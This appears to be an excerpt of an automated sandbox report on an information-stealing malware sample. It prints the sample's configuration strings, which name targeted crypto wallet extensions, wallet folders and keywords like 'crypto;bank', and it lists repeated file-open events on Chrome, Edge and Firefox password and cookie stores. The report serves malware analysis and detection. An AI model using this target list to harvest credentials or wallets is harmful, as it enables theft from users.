                          Source: hypersurrogateComponentdhcp.exe, 00000005.00000002.1889265427.00000000030C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ],"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"Current User","_3":"True"},"90f3c523-0b6b-4956-a617-29c89ed8da84":{"_0":"mail.google.com;example.com;any.domain.net","_1":"mail.google.com;example.com;any.domain.net"},"8c7d95c1-4def-4a0e-952b-f3c453358f2e":{"_0":"","_1":"Full path"},"d1159ac1-2243-45e3-9bad-55df4f7732e9":{"_0":"crypto;bank;authorization;account","_1":"15000000","_2":"15","_3":"True"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"Builds","_1":""}}
                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.2935880086.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.2935880086.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                          Source: powershell.exe, 00000007.00000002.2828919163.00007FFD9BBC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
                          Tries to harvest and steal browser information (history, passwords, etc)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
